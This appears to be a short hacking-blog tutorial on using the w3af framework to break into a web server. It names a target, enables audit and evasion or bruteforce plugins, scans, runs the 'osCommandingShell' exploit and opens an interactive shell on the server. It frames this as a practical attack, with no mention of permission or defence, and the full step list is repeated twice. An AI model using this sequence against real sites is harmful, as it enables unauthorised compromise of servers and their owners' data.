Hello everyone, you all know about Metasploit and use it to exploit the targets. Good good...but do you know about w3af ( Web Application Attack and Audit Framework) by Rapid7. Yes, It is also developed by Rapid 7 which is a famous security firm and developed Metasploit. It is not bigger than metasploit, but it is more powerful than the other web testing tools. OK now introduction is over. We proceed to the practical.
Requisites: Python and w3af
Step 1: Open the console and type:
target
set target www.site.com
Step 2: Now type:
plugins
Step 3: Now we'll look for available plugins to enable them by typing:
help
Step 4: First category we chose is audit , so we'll type:
audit
Step 5: Now we'll chose the plugin from category "audit". Type:
audit "name of plugin" (as mentioned in the picture)
You can chose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3>.....
Step 6: If you saw any plugin with config option marked as "YES" then to configure it type:
audit config <plugin>
Step 7: Now type:
back
Step 8: Chose another category: (if you want)
evasion or bruteforce or anyone
Step 9: Now we are ready with our values, to start the scanning type:
start scan
Step 10: After finishing the scan, we'll have to exploit the target. So type:
Exploit
Step 11: Again type:
Exploit osCommandingShell
Step 12: If everything goes right, we'll get the shell of the server, type:
interact 0 (zero)
Step 13: Hey, You got the shell, no more steps...!!! :P
Write to me for cheat sheet. :)
Requisites: Python and w3af
Step 1: Open the console and type:
target
set target www.site.com
Step 2: Now type:
plugins
Step 3: Now we'll look for available plugins to enable them by typing:
help
Step 4: First category we chose is audit , so we'll type:
audit
Step 5: Now we'll chose the plugin from category "audit". Type:
audit "name of plugin" (as mentioned in the picture)
You can chose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3>.....
Step 6: If you saw any plugin with config option marked as "YES" then to configure it type:
audit config <plugin>
Step 7: Now type:
back
Step 8: Chose another category: (if you want)
evasion or bruteforce or anyone
Step 9: Now we are ready with our values, to start the scanning type:
start scan
Step 10: After finishing the scan, we'll have to exploit the target. So type:
Exploit
Step 11: Again type:
Exploit osCommandingShell
Step 12: If everything goes right, we'll get the shell of the server, type:
interact 0 (zero)
Step 13: Hey, You got the shell, no more steps...!!! :P
Write to me for cheat sheet. :)